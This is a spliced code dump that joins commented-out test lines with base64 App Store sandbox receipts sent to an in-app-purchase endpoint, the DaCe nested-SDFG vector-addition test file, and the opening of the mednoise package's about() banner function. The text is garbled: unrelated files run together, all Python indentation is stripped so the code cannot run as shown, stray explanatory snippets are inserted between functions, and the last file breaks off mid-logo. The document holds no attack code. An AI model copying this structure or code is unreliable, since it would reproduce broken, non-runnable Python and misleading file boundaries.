# data = 'ewoJInNpZ25hdHVyZSIgPSAiQWdKd2tNVzQrNTh6cGpNUG9Ga1NxamtyM0p1R0tk\r\nczVJVGIvYlhzeUd2MXZ0MndYQWl6N3htQmFUYVVua2RRM25oM2dBdFM2TnFnWjFS\r\nbUVWbEhkQW01N2pEQ1FYQk1Uc0ZUeFA3cDFlbnBrUXR3cUxGTHdDajZmbEowTXEw\r\ndFRIRUtnOGlKa0ptSmFtQjRjLy9xZ1VFanJWQ2Nid0ZwOXZneHdYYWo5WDVaeEFB\r\nQURWekNDQTFNd2dnSTdvQU1DQVFJQ0NHVVVrVTNaV0FTMU1BMEdDU3FHU0liM0RR\r\nRUJCUVVBTUg4eEN6QUpCZ05WQkFZVEFsVlRNUk13RVFZRFZRUUtEQXBCY0hCc1pT\r\nQkpibU11TVNZd0pBWURWUVFMREIxQmNIQnNaU0JEWlhKMGFXWnBZMkYwYVc5dUlF\r\nRjFkR2h2Y21sMGVURXpNREVHQTFVRUF3d3FRWEJ3YkdVZ2FWUjFibVZ6SUZOMGIz\r\nSmxJRU5sY25ScFptbGpZWFJwYjI0Z1FYVjBhRzl5YVhSNU1CNFhEVEE1TURZeE5U\r\nSXlNRFUxTmxvWERURTBNRFl4TkRJeU1EVTFObG93WkRFak1DRUdBMVVFQXd3YVVI\r\nVnlZMmhoYzJWU1pXTmxhWEIwUTJWeWRHbG1hV05oZEdVeEd6QVpCZ05WQkFzTUVr\r\nRndjR3hsSUdsVWRXNWxjeUJUZEc5eVpURVRNQkVHQTFVRUNnd0tRWEJ3YkdVZ1NX\r\nNWpMakVMTUFrR0ExVUVCaE1DVlZNd2daOHdEUVlKS29aSWh2Y05BUUVCQlFBRGdZ\r\nMEFNSUdKQW9HQkFNclJqRjJjdDRJclNkaVRDaGFJMGc4cHd2L2NtSHM4cC9Sd1Yv\r\ncnQvOTFYS1ZoTmw0WElCaW1LalFRTmZnSHNEczZ5anUrK0RyS0pFN3VLc3BoTWRk\r\nS1lmRkU1ckdYc0FkQkVqQndSSXhleFRldngzSExFRkdBdDFtb0t4NTA5ZGh4dGlJ\r\nZERnSnYyWWFWczQ5QjB1SnZOZHk2U01xTk5MSHNETHpEUzlvWkhBZ01CQUFHamNq\r\nQndNQXdHQTFVZEV3RUIvd1FDTUFBd0h3WURWUjBqQkJnd0ZvQVVOaDNvNHAyQzBn\r\nRVl0VEpyRHRkREM1RllRem93RGdZRFZSMFBBUUgvQkFRREFnZUFNQjBHQTFVZERn\r\nUVdCQlNwZzRQeUdVakZQaEpYQ0JUTXphTittVjhrOVRBUUJnb3Foa2lHOTJOa0Jn\r\nVUJCQUlGQURBTkJna3Foa2lHOXcwQkFRVUZBQU9DQVFFQUVhU2JQanRtTjRDL0lC\r\nM1FFcEszMlJ4YWNDRFhkVlhBZVZSZVM1RmFaeGMrdDg4cFFQOTNCaUF4dmRXLzNl\r\nVFNNR1k1RmJlQVlMM2V0cVA1Z204d3JGb2pYMGlreVZSU3RRKy9BUTBLRWp0cUIw\r\nN2tMczlRVWU4Y3pSOFVHZmRNMUV1bVYvVWd2RGQ0TndOWXhMUU1nNFdUUWZna1FR\r\nVnk4R1had1ZIZ2JFL1VDNlk3MDUzcEdYQms1MU5QTTN3b3hoZDNnU1JMdlhqK2xv\r\nSHNTdGNURXFlOXBCRHBtRzUrc2s0dHcrR0szR01lRU41LytlMVFUOW5wL0tsMW5q\r\nK2FCdzdDMHhzeTBiRm5hQWQxY1NTNnhkb3J5L0NVdk02Z3RLc21uT09kcVRlc2Jw\r\nMGJzOHNuNldxczBDOWRnY3hSSHVPTVoydG04bnBMVW03YXJnT1N6UT09IjsKCSJw\r\ndXJjaGFzZS1pbmZvIiA9ICJld29KSW05eWFXZHBibUZzTFhCMWNtTm9ZWE5sTFdS\r\naGRHVXRjSE4wSWlBOU
lDSXlNREV5TFRFeExUQTVJREExT2pVM09qTTNJRUZ0WlhK\r\ncFkyRXZURzl6WDBGdVoyVnNaWE1pT3dvSkluVnVhWEYxWlMxcFpHVnVkR2xtYVdW\r\neUlpQTlJQ0l3TURBd1lqQXdPVEk0TVRnaU93b0pJbTl5YVdkcGJtRnNMWFJ5WVc1\r\nellXTjBhVzl1TFdsa0lpQTlJQ0l4TURBd01EQXdNRFU0TXpZMU16SXlJanNLQ1NK\r\naWRuSnpJaUE5SUNJeExqQWlPd29KSW5SeVlXNXpZV04wYVc5dUxXbGtJaUE5SUNJ\r\neE1EQXdNREF3TURVNE16WTFNekl5SWpzS0NTSnhkV0Z1ZEdsMGVTSWdQU0FpTVNJ\r\nN0Nna2liM0pwWjJsdVlXd3RjSFZ5WTJoaGMyVXRaR0YwWlMxdGN5SWdQU0FpTVRN\r\nMU1qUTJPVFExTnpRMk9DSTdDZ2tpY0hKdlpIVmpkQzFwWkNJZ1BTQWlZWE11WTJG\r\ndWRpNWtjbUYzY1hWbGMzUXVjSEp2WkhWamRITXVZMjlwYm5NdU1UQXdJanNLQ1NK\r\ncGRHVnRMV2xrSWlBOUlDSTFOelk1TWpFeU1ESWlPd29KSW1KcFpDSWdQU0FpWVhN\r\ndVkyRnVkaTVrY21GM2NYVmxjM1FpT3dvSkluQjFjbU5vWVhObExXUmhkR1V0YlhN\r\naUlEMGdJakV6TlRJME5qazBOVGMwTmpnaU93b0pJbkIxY21Ob1lYTmxMV1JoZEdV\r\naUlEMGdJakl3TVRJdE1URXRNRGtnTVRNNk5UYzZNemNnUlhSakwwZE5WQ0k3Q2dr\r\naWNIVnlZMmhoYzJVdFpHRjBaUzF3YzNRaUlEMGdJakl3TVRJdE1URXRNRGtnTURV\r\nNk5UYzZNemNnUVcxbGNtbGpZUzlNYjNOZlFXNW5aV3hsY3lJN0Nna2liM0pwWjJs\r\ndVlXd3RjSFZ5WTJoaGMyVXRaR0YwWlNJZ1BTQWlNakF4TWkweE1TMHdPU0F4TXpv\r\nMU56b3pOeUJGZEdNdlIwMVVJanNLZlE9PSI7CgkiZW52aXJvbm1lbnQiID0gIlNh\r\nbmRib3giOwoJInBvZCIgPSAiMTAwIjsKCSJzaWduaW5nLXN0YXR1cyIgPSAiMCI7\r\nCn0='
# #data = 'ewoJInNpZ25hdHVyZSIgPSAiQWdvL29UYUE4YjhocHorMVVmZ1hDYlFnRDM2U3dN\r\nd05EVi9SN3hCUzQvUm0xbVB3TWE3bGNjMFVnZ1llaTRNTEJQa003YStzcklhaThn\r\nQzJkR0psdHJidUw1NlRQYTFNQWllRzNrMitoVXd4SDQ5ckE5K2FCMzA1aCtkRHVu\r\nVFRKTWRmUVozcjB0emM5enZzZ0ZvL3NVeU9yTGFwWFFEVGh6S2JramtmbDQ3K0FB\r\nQURWekNDQTFNd2dnSTdvQU1DQVFJQ0NHVVVrVTNaV0FTMU1BMEdDU3FHU0liM0RR\r\nRUJCUVVBTUg4eEN6QUpCZ05WQkFZVEFsVlRNUk13RVFZRFZRUUtEQXBCY0hCc1pT\r\nQkpibU11TVNZd0pBWURWUVFMREIxQmNIQnNaU0JEWlhKMGFXWnBZMkYwYVc5dUlF\r\nRjFkR2h2Y21sMGVURXpNREVHQTFVRUF3d3FRWEJ3YkdVZ2FWUjFibVZ6SUZOMGIz\r\nSmxJRU5sY25ScFptbGpZWFJwYjI0Z1FYVjBhRzl5YVhSNU1CNFhEVEE1TURZeE5U\r\nSXlNRFUxTmxvWERURTBNRFl4TkRJeU1EVTFObG93WkRFak1DRUdBMVVFQXd3YVVI\r\nVnlZMmhoYzJWU1pXTmxhWEIwUTJWeWRHbG1hV05oZEdVeEd6QVpCZ05WQkFzTUVr\r\nRndjR3hsSUdsVWRXNWxjeUJUZEc5eVpURVRNQkVHQTFVRUNnd0tRWEJ3YkdVZ1NX\r\nNWpMakVMTUFrR0ExVUVCaE1DVlZNd2daOHdEUVlKS29aSWh2Y05BUUVCQlFBRGdZ\r\nMEFNSUdKQW9HQkFNclJqRjJjdDRJclNkaVRDaGFJMGc4cHd2L2NtSHM4cC9Sd1Yv\r\ncnQvOTFYS1ZoTmw0WElCaW1LalFRTmZnSHNEczZ5anUrK0RyS0pFN3VLc3BoTWRk\r\nS1lmRkU1ckdYc0FkQkVqQndSSXhleFRldngzSExFRkdBdDFtb0t4NTA5ZGh4dGlJ\r\nZERnSnYyWWFWczQ5QjB1SnZOZHk2U01xTk5MSHNETHpEUzlvWkhBZ01CQUFHamNq\r\nQndNQXdHQTFVZEV3RUIvd1FDTUFBd0h3WURWUjBqQkJnd0ZvQVVOaDNvNHAyQzBn\r\nRVl0VEpyRHRkREM1RllRem93RGdZRFZSMFBBUUgvQkFRREFnZUFNQjBHQTFVZERn\r\nUVdCQlNwZzRQeUdVakZQaEpYQ0JUTXphTittVjhrOVRBUUJnb3Foa2lHOTJOa0Jn\r\nVUJCQUlGQURBTkJna3Foa2lHOXcwQkFRVUZBQU9DQVFFQUVhU2JQanRtTjRDL0lC\r\nM1FFcEszMlJ4YWNDRFhkVlhBZVZSZVM1RmFaeGMrdDg4cFFQOTNCaUF4dmRXLzNl\r\nVFNNR1k1RmJlQVlMM2V0cVA1Z204d3JGb2pYMGlreVZSU3RRKy9BUTBLRWp0cUIw\r\nN2tMczlRVWU4Y3pSOFVHZmRNMUV1bVYvVWd2RGQ0TndOWXhMUU1nNFdUUWZna1FR\r\nVnk4R1had1ZIZ2JFL1VDNlk3MDUzcEdYQms1MU5QTTN3b3hoZDNnU1JMdlhqK2xv\r\nSHNTdGNURXFlOXBCRHBtRzUrc2s0dHcrR0szR01lRU41LytlMVFUOW5wL0tsMW5q\r\nK2FCdzdDMHhzeTBiRm5hQWQxY1NTNnhkb3J5L0NVdk02Z3RLc21uT09kcVRlc2Jw\r\nMGJzOHNuNldxczBDOWRnY3hSSHVPTVoydG04bnBMVW03YXJnT1N6UT09IjsKCSJw\r\ndXJjaGFzZS1pbmZvIiA9ICJld29KSW05eWFXZHBibUZzTFhCMWNtTm9ZWE5sTFdS\r\naGRHVXRjSE4wSWlBO
UlDSXlNREV6TFRBeExURXdJREUyT2pBNE9qSTJJRUZ0WlhK\r\ncFkyRXZURzl6WDBGdVoyVnNaWE1pT3dvSkluQjFjbU5vWVhObExXUmhkR1V0YlhN\r\naUlEMGdJakV6TlRjNE5qSTVNRFk1T1RjaU93b0pJblZ1YVhGMVpTMXBaR1Z1ZEds\r\nbWFXVnlJaUE5SUNJM01ESTJZVGM1TXpjNVptUmtZakZqTmpjNU1XRm1OVE13TW1F\r\nMlpUVTFNbVU0TnpCaVlqY3hJanNLQ1NKdmNtbG5hVzVoYkMxMGNtRnVjMkZqZEds\r\ndmJpMXBaQ0lnUFNBaU1qTXdNREF3TURJME5qQTJPRFEzSWpzS0NTSmlkbkp6SWlB\r\nOUlDSXhMakFpT3dvSkltRndjQzFwZEdWdExXbGtJaUE5SUNJMU56WTVNVGMwTWpV\r\naU93b0pJblJ5WVc1ellXTjBhVzl1TFdsa0lpQTlJQ0l5TXpBd01EQXdNalEyTURZ\r\nNE5EY2lPd29KSW5GMVlXNTBhWFI1SWlBOUlDSXhJanNLQ1NKdmNtbG5hVzVoYkMx\r\nd2RYSmphR0Z6WlMxa1lYUmxMVzF6SWlBOUlDSXhNelUzT0RZeU9UQTJPVGszSWpz\r\nS0NTSjFibWx4ZFdVdGRtVnVaRzl5TFdsa1pXNTBhV1pwWlhJaUlEMGdJalJHTWtK\r\nRFEwWXhMVGhGTVRjdE5EYzVNQzFDUTBNNUxVUkdNRVkzTURjME1EZEVNU0k3Q2dr\r\naWFYUmxiUzFwWkNJZ1BTQWlOVGMyT1RJeE1qQXlJanNLQ1NKMlpYSnphVzl1TFdW\r\nNGRHVnlibUZzTFdsa1pXNTBhV1pwWlhJaUlEMGdJakV4T1RBek1UUTBJanNLQ1NK\r\nd2NtOWtkV04wTFdsa0lpQTlJQ0poY3k1allXNTJMbVJ5WVhkeGRXVnpkQzV3Y205\r\na2RXTjBjeTVqYjJsdWN5NHhNREFpT3dvSkluQjFjbU5vWVhObExXUmhkR1VpSUQw\r\nZ0lqSXdNVE10TURFdE1URWdNREE2TURnNk1qWWdSWFJqTDBkTlZDSTdDZ2tpYjNK\r\ncFoybHVZV3d0Y0hWeVkyaGhjMlV0WkdGMFpTSWdQU0FpTWpBeE15MHdNUzB4TVNB\r\nd01Eb3dPRG95TmlCRmRHTXZSMDFVSWpzS0NTSmlhV1FpSUQwZ0ltRnpMbU5oYm5Z\r\ndVpISmhkM0YxWlhOMElqc0tDU0p3ZFhKamFHRnpaUzFrWVhSbExYQnpkQ0lnUFNB\r\naU1qQXhNeTB3TVMweE1DQXhOam93T0RveU5pQkJiV1Z5YVdOaEwweHZjMTlCYm1k\r\nbGJHVnpJanNLZlE9PSI7CgkicG9kIiA9ICIyMyI7Cgkic2lnbmluZy1zdGF0dXMi\r\nID0gIjAiOwp9'
# def balance():
#     return self.api_post('/api/economy/balance', user=user)['balance']
# old_balance = balance()
# resp = self.api_post('/api/iap/process_receipt', {'receipt_data': data}, user=user)
# self.assertAPISuccess(resp)
# self.assertEqual(balance() - old_balance, resp['balance'])
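# The commented-out `data` strings above are base64-encoded App Store receipt
# blobs, with literal "\r\n" continuation markers embedded in the text. A
# minimal sketch of how such a blob could be decoded for inspection follows;
# `decode_receipt` and `sample` are hypothetical helpers, not part of the
# test suite:

```python
import base64

def decode_receipt(data: str) -> str:
    """Strip line-continuation markers and decode a base64 receipt blob."""
    cleaned = data.replace("\\r\\n", "").replace("\r", "").replace("\n", "")
    return base64.b64decode(cleaned).decode("utf-8", errors="replace")

# Round-trip a small sample payload
sample = base64.b64encode(b'{"signing-status" = "0";}').decode()
print(decode_receipt(sample))  # -> {"signing-status" = "0";}
```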
# tests/unique_nested_sdfg_test.py (Walon1998/dace, BSD-3-Clause)
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
# The scope of this test is to verify that the code for nested SDFGs with a unique name is generated only once.
# Each nested SDFG computes a vector addition.
import dace
import numpy as np
import argparse
import subprocess
from dace.memlet import Memlet
size_n = 32
size_m = 64
def make_vecAdd_sdfg(sdfg_name: str, dtype=dace.float32):
'''
Builds an SDFG for vector addition
:param sdfg_name: name to give to the sdfg
:param dtype: used data type
:return: an SDFG
'''
n = dace.symbol("size")
vecAdd_sdfg = dace.SDFG(sdfg_name)
vecAdd_state = vecAdd_sdfg.add_state("vecAdd_nested")
# ---------- ----------
# ACCESS NODES
# ---------- ----------
x_name = "x"
y_name = "y"
z_name = "z"
vecAdd_sdfg.add_array(x_name, [n], dtype=dtype)
vecAdd_sdfg.add_array(y_name, [n], dtype=dtype)
vecAdd_sdfg.add_array(z_name, [n], dtype=dtype)
x_in = vecAdd_state.add_read(x_name)
y_in = vecAdd_state.add_read(y_name)
z_out = vecAdd_state.add_write(z_name)
# ---------- ----------
# COMPUTE
# ---------- ----------
vecMap_entry, vecMap_exit = vecAdd_state.add_map('vecAdd_map', dict(i='0:{}'.format(n)))
vecAdd_tasklet = vecAdd_state.add_tasklet('vecAdd_task', ['x_con', 'y_con'], ['z_con'], 'z_con = x_con + y_con')
vecAdd_state.add_memlet_path(x_in,
vecMap_entry,
vecAdd_tasklet,
dst_conn='x_con',
memlet=dace.Memlet.simple(x_in.data, 'i'))
vecAdd_state.add_memlet_path(y_in,
vecMap_entry,
vecAdd_tasklet,
dst_conn='y_con',
memlet=dace.Memlet.simple(y_in.data, 'i'))
vecAdd_state.add_memlet_path(vecAdd_tasklet,
vecMap_exit,
z_out,
src_conn='z_con',
memlet=dace.Memlet.simple(z_out.data, 'i'))
return vecAdd_sdfg
def make_nested_vecAdd_sdfg(sdfg_name: str, dtype=dace.float32):
'''
Builds an SDFG for vector addition. Internally has a nested SDFG in charge of actually
performing the computation.
:param sdfg_name: name to give to the sdfg
:param dtype: used data type
:return: an SDFG
'''
n = dace.symbol("size")
vecAdd_parent_sdfg = dace.SDFG(sdfg_name)
vecAdd_parent_state = vecAdd_parent_sdfg.add_state("vecAdd_parent")
# ---------- ----------
# ACCESS NODES
# ---------- ----------
x_name = "x"
y_name = "y"
z_name = "z"
vecAdd_parent_sdfg.add_array(x_name, [n], dtype=dtype)
vecAdd_parent_sdfg.add_array(y_name, [n], dtype=dtype)
vecAdd_parent_sdfg.add_array(z_name, [n], dtype=dtype)
x_in = vecAdd_parent_state.add_read(x_name)
y_in = vecAdd_parent_state.add_read(y_name)
z_out = vecAdd_parent_state.add_write(z_name)
# ---------- ----------
# COMPUTE
# ---------- ----------
# Create the nested SDFG for vector addition
nested_sdfg_name = sdfg_name + "_nested"
to_nest = make_vecAdd_sdfg(nested_sdfg_name, dtype)
# Nest it and connect memlets
nested_sdfg = vecAdd_parent_state.add_nested_sdfg(to_nest, vecAdd_parent_sdfg, {"x", "y"}, {"z"})
vecAdd_parent_state.add_memlet_path(x_in,
nested_sdfg,
dst_conn="x",
memlet=Memlet.simple(x_in, "0:size", num_accesses=n))
vecAdd_parent_state.add_memlet_path(y_in,
nested_sdfg,
dst_conn="y",
memlet=Memlet.simple(y_in, "0:size", num_accesses=n))
vecAdd_parent_state.add_memlet_path(nested_sdfg,
z_out,
src_conn="z",
memlet=Memlet.simple(z_out, "0:size", num_accesses=n))
return vecAdd_parent_sdfg
def make_nested_sdfg_cpu_single_state():
'''
Builds an SDFG with two identical nested SDFGs
'''
n = dace.symbol("n")
m = dace.symbol("m")
sdfg = dace.SDFG("two_vecAdd")
state = sdfg.add_state("state")
# build the first axpy: works with x,y, and z of n-elements
    # ATTENTION: these two nested SDFGs must have the same name, as they are identical
to_nest = make_vecAdd_sdfg("vecAdd")
sdfg.add_array("x", [n], dace.float32)
sdfg.add_array("y", [n], dace.float32)
sdfg.add_array("z", [n], dace.float32)
x = state.add_read("x")
y = state.add_read("y")
z = state.add_write("z")
# add it as nested SDFG, with proper symbol mapping
nested_sdfg = state.add_nested_sdfg(to_nest, sdfg, {"x", "y"}, {"z"}, {"size": "n"})
state.add_memlet_path(x, nested_sdfg, dst_conn="x", memlet=Memlet.simple(x, "0:n", num_accesses=n))
state.add_memlet_path(y, nested_sdfg, dst_conn="y", memlet=Memlet.simple(y, "0:n", num_accesses=n))
state.add_memlet_path(nested_sdfg, z, src_conn="z", memlet=Memlet.simple(z, "0:n", num_accesses=n))
# Build the second axpy: works with v,w and u of m elements
to_nest = make_vecAdd_sdfg("vecAdd")
sdfg.add_array("v", [m], dace.float32)
sdfg.add_array("w", [m], dace.float32)
sdfg.add_array("u", [m], dace.float32)
v = state.add_read("v")
w = state.add_read("w")
u = state.add_write("u")
nested_sdfg = state.add_nested_sdfg(to_nest, sdfg, {"x", "y"}, {"z"}, {"size": "m"})
state.add_memlet_path(v, nested_sdfg, dst_conn="x", memlet=Memlet.simple(v, "0:m", num_accesses=m))
state.add_memlet_path(w, nested_sdfg, dst_conn="y", memlet=Memlet.simple(w, "0:m", num_accesses=m))
state.add_memlet_path(nested_sdfg, u, src_conn="z", memlet=Memlet.simple(u, "0:m", num_accesses=m))
return sdfg
def make_nested_sdfg_cpu_two_states():
'''
Builds an SDFG with two nested SDFGs, one per state
'''
n = dace.symbol("n")
m = dace.symbol("m")
sdfg = dace.SDFG("two_vecAdd")
state_0 = sdfg.add_state("state_0")
# build the first axpy: works with x,y, and z of n-elements
    # ATTENTION: these two nested SDFGs must have the same name, as they are identical
to_nest = make_vecAdd_sdfg("vecAdd")
sdfg.add_array("x", [n], dace.float32)
sdfg.add_array("y", [n], dace.float32)
sdfg.add_array("z", [n], dace.float32)
x = state_0.add_read("x")
y = state_0.add_read("y")
z = state_0.add_write("z")
# add it as nested SDFG, with proper symbol mapping
nested_sdfg = state_0.add_nested_sdfg(to_nest, sdfg, {"x", "y"}, {"z"}, {"size": "n"})
state_0.add_memlet_path(x, nested_sdfg, dst_conn="x", memlet=Memlet.simple(x, "0:n", num_accesses=n))
state_0.add_memlet_path(y, nested_sdfg, dst_conn="y", memlet=Memlet.simple(y, "0:n", num_accesses=n))
state_0.add_memlet_path(nested_sdfg, z, src_conn="z", memlet=Memlet.simple(z, "0:n", num_accesses=n))
    # Build the second axpy in another state; it works with v, w, and u of m elements
state_1 = sdfg.add_state_after(state_0, "state_1")
to_nest = make_vecAdd_sdfg("vecAdd")
sdfg.add_array("v", [m], dace.float32)
sdfg.add_array("w", [m], dace.float32)
sdfg.add_array("u", [m], dace.float32)
v = state_1.add_read("v")
w = state_1.add_read("w")
u = state_1.add_write("u")
nested_sdfg = state_1.add_nested_sdfg(to_nest, sdfg, {"x", "y"}, {"z"}, {"size": "m"})
state_1.add_memlet_path(v, nested_sdfg, dst_conn="x", memlet=Memlet.simple(v, "0:m", num_accesses=m))
state_1.add_memlet_path(w, nested_sdfg, dst_conn="y", memlet=Memlet.simple(w, "0:m", num_accesses=m))
state_1.add_memlet_path(nested_sdfg, u, src_conn="z", memlet=Memlet.simple(u, "0:m", num_accesses=m))
return sdfg
def make_nested_nested_sdfg_cpu():
'''
Builds an SDFG with two nested SDFGs, each of them has internally another Nested SDFG
'''
n = dace.symbol("n")
m = dace.symbol("m")
sdfg = dace.SDFG("nested_nested_vecAdd")
state_0 = sdfg.add_state("state_0")
# build the first axpy: works with x,y, and z of n-elements
    # ATTENTION: these two nested SDFGs must have the same name, as they are identical
to_nest = make_nested_vecAdd_sdfg("vecAdd")
sdfg.add_array("x", [n], dace.float32)
sdfg.add_array("y", [n], dace.float32)
sdfg.add_array("z", [n], dace.float32)
x = state_0.add_read("x")
y = state_0.add_read("y")
z = state_0.add_write("z")
# add it as nested SDFG, with proper symbol mapping
nested_sdfg = state_0.add_nested_sdfg(to_nest, sdfg, {"x", "y"}, {"z"}, {"size": "n"})
state_0.add_memlet_path(x, nested_sdfg, dst_conn="x", memlet=Memlet.simple(x, "0:n", num_accesses=n))
state_0.add_memlet_path(y, nested_sdfg, dst_conn="y", memlet=Memlet.simple(y, "0:n", num_accesses=n))
state_0.add_memlet_path(nested_sdfg, z, src_conn="z", memlet=Memlet.simple(z, "0:n", num_accesses=n))
    # Build the second axpy in another state; it works with v, w, and u of m elements
state_1 = sdfg.add_state_after(state_0, "state_1")
to_nest = make_nested_vecAdd_sdfg("vecAdd")
sdfg.add_array("v", [m], dace.float32)
sdfg.add_array("w", [m], dace.float32)
sdfg.add_array("u", [m], dace.float32)
v = state_1.add_read("v")
w = state_1.add_read("w")
u = state_1.add_write("u")
nested_sdfg = state_1.add_nested_sdfg(to_nest, sdfg, {"x", "y"}, {"z"}, {"size": "m"})
state_1.add_memlet_path(v, nested_sdfg, dst_conn="x", memlet=Memlet.simple(v, "0:m", num_accesses=m))
state_1.add_memlet_path(w, nested_sdfg, dst_conn="y", memlet=Memlet.simple(w, "0:m", num_accesses=m))
state_1.add_memlet_path(nested_sdfg, u, src_conn="z", memlet=Memlet.simple(u, "0:m", num_accesses=m))
return sdfg
def test_single_state():
sdfg = make_nested_sdfg_cpu_single_state()
two_axpy = sdfg.compile()
x = np.random.rand(size_n).astype(np.float32)
y = np.random.rand(size_n).astype(np.float32)
z = np.random.rand(size_n).astype(np.float32)
v = np.random.rand(size_m).astype(np.float32)
w = np.random.rand(size_m).astype(np.float32)
u = np.random.rand(size_m).astype(np.float32)
two_axpy(x=x, y=y, z=z, v=v, w=w, u=u, n=size_n, m=size_m)
ref1 = np.add(x, y)
ref2 = np.add(v, w)
diff1 = np.linalg.norm(ref1 - z) / size_n
diff2 = np.linalg.norm(ref2 - u) / size_m
    # There is no need to check explicitly that the nested SDFG has been generated only once:
    # if it was not, the test fails during compilation
assert diff1 <= 1e-5 and diff2 <= 1e-5
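# The relative-error criterion used in these tests can be sketched in
# isolation (plain NumPy, no DaCe needed; the arrays below are hypothetical
# stand-ins for the SDFG inputs and output):

```python
import numpy as np

x = np.array([1.0, 2.0, 3.0], dtype=np.float32)
y = np.array([4.0, 5.0, 6.0], dtype=np.float32)
z = x + y                                    # stands in for the SDFG output
diff = np.linalg.norm(np.add(x, y) - z) / x.size
assert diff <= 1e-5
```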
def test_two_states():
sdfg = make_nested_sdfg_cpu_two_states()
two_axpy = sdfg.compile()
x = np.random.rand(size_n).astype(np.float32)
y = np.random.rand(size_n).astype(np.float32)
z = np.random.rand(size_n).astype(np.float32)
v = np.random.rand(size_m).astype(np.float32)
w = np.random.rand(size_m).astype(np.float32)
u = np.random.rand(size_m).astype(np.float32)
two_axpy(x=x, y=y, z=z, v=v, w=w, u=u, n=size_n, m=size_m)
ref1 = np.add(x, y)
ref2 = np.add(v, w)
diff1 = np.linalg.norm(ref1 - z) / size_n
diff2 = np.linalg.norm(ref2 - u) / size_m
assert diff1 <= 1e-5 and diff2 <= 1e-5
def test_nested_nested():
sdfg = make_nested_nested_sdfg_cpu()
two_axpy = sdfg.compile()
x = np.random.rand(size_n).astype(np.float32)
y = np.random.rand(size_n).astype(np.float32)
z = np.random.rand(size_n).astype(np.float32)
v = np.random.rand(size_m).astype(np.float32)
w = np.random.rand(size_m).astype(np.float32)
u = np.random.rand(size_m).astype(np.float32)
two_axpy(x=x, y=y, z=z, v=v, w=w, u=u, n=size_n, m=size_m)
ref1 = np.add(x, y)
ref2 = np.add(v, w)
diff1 = np.linalg.norm(ref1 - z) / size_n
diff2 = np.linalg.norm(ref2 - u) / size_m
assert diff1 <= 1e-5 and diff2 <= 1e-5
if __name__ == "__main__":
test_single_state()
test_two_states()
test_nested_nested()
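# The property under test (code for a nested SDFG with a given name is
# generated only once) can be sketched without DaCe. `generate_once` below is
# a hypothetical stand-in for a code generator that caches emitted code by
# SDFG name:

```python
def generate_once(sdfg_names):
    """Emit code for each unique SDFG name only once, preserving order."""
    emitted = {}
    for name in sdfg_names:
        if name not in emitted:
            emitted[name] = f"// code for {name}"
    return list(emitted)

print(generate_once(["vecAdd", "vecAdd", "vecAdd_nested"]))  # -> ['vecAdd', 'vecAdd_nested']
```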
# src/mednoise/all.py (mednoise/mednoise, Apache-2.0)
import tkinter as tk
from PIL import ImageTk, Image, ImageDraw
import ntpath
import glob2 as glob
from collections import OrderedDict
import datetime
import numpy as np
from scipy.spatial import distance
def about(header=False):
"""
Provides a header and front-end interface for new users and pipeline workflows.
Parameters
----------
    header : boolean, default: False
        Determines whether to display only the header (``True``) or the full
        front-end interface (``False``). By default, this is set to ``False``,
        meaning that the interactive front-end interface is generated.
Notes
-----
    This is the most front-facing part of **mednoise**. Beyond this, **mednoise** is
    a series of scripts to be included in a terminal or pipeline workflow.
Examples
--------
>>> md.about()
#############################################################################################
8I
8I
8I gg
8I ""
,ggg,,ggg,,ggg, ,ggg, ,gggg,8I ,ggg,,ggg, ,ggggg, gg ,g, ,ggg,
,8" "8P" "8P" "8, i8" "8i dP" "Y8I ,8" "8P" "8, dP" "Y8ggg 88 ,8'8, i8" "8i
I8 8I 8I 8I I8, ,8I i8' ,8I I8 8I 8I i8' ,8I 88 ,8' Yb I8, ,8I
,dP 8I 8I Yb, `YbadP' ,d8, ,d8b,,dP 8I Yb,,d8, ,d8' _,88,_,8'_ 8) `YbadP'
8P' 8I 8I `Y8888P"Y888P"Y8888P"`Y88P' 8I `Y8P"Y8888P" 8P""Y8P' "YY8P8P888P"Y888
#############################################################################################
>>> md.about(header=True)
#############################################################################################
8I
8I
8I gg
8I ""
,ggg,,ggg,,ggg, ,ggg, ,gggg,8I ,ggg,,ggg, ,ggggg, gg ,g, ,ggg,
,8" "8P" "8P" "8, i8" "8i dP" "Y8I ,8" "8P" "8, dP" "Y8ggg 88 ,8'8, i8" "8i
I8 8I 8I 8I I8, ,8I i8' ,8I I8 8I 8I i8' ,8I 88 ,8' Yb I8, ,8I
,dP 8I 8I Yb, `YbadP' ,d8, ,d8b,,dP 8I Yb,,d8, ,d8' _,88,_,8'_ 8) `YbadP'
8P' 8I 8I `Y8888P"Y888P"Y8888P"`Y88P' 8I `Y8P"Y8888P" 8P""Y8P' "YY8P8P888P"Y888
#############################################################################################
Copyright 2021 Ravi Bandaru
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this package except in compliance with the License.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#############################################################################################
Welcome to mednoise, a python package that contains algorithms to handle and pre-process
large amounts of image-based metadata to remove noise and enhance the accuracy of machine
learning and deep learning models for scientific research.
#############################################################################################
You can bring up the help menu (h) or exit (e).
"""
if header==True:
logo = """
#############################################################################################
8I
8I
8I gg
8I ""
,ggg,,ggg,,ggg, ,ggg, ,gggg,8I ,ggg,,ggg, ,ggggg, gg ,g, ,ggg,
,8" "8P" "8P" "8, i8" "8i dP" "Y8I ,8" "8P" "8, dP" "Y8ggg 88 ,8'8, i8" "8i
I8 8I 8I 8I I8, ,8I i8' ,8I I8 8I 8I i8' ,8I 88 ,8' Yb I8, ,8I
,dP 8I 8I Yb, `YbadP' ,d8, ,d8b,,dP 8I Yb,,d8, ,d8' _,88,_,8'_ 8) `YbadP'
8P' 8I 8I `Y8888P"Y888P"Y8888P"`Y88P' 8I `Y8P"Y8888P" 8P""Y8P' "YY8P8P888P"Y888
#############################################################################################
"""
print(logo)
global storeddictionary
global analyzedval
storeddictionary = 1
analyzedval = 1
if header==False:
logo = """
#############################################################################################
8I
8I
8I gg
8I ""
,ggg,,ggg,,ggg, ,ggg, ,gggg,8I ,ggg,,ggg, ,ggggg, gg ,g, ,ggg,
,8" "8P" "8P" "8, i8" "8i dP" "Y8I ,8" "8P" "8, dP" "Y8ggg 88 ,8'8, i8" "8i
I8 8I 8I 8I I8, ,8I i8' ,8I I8 8I 8I i8' ,8I 88 ,8' Yb I8, ,8I
,dP 8I 8I Yb, `YbadP' ,d8, ,d8b,,dP 8I Yb,,d8, ,d8' _,88,_,8'_ 8) `YbadP'
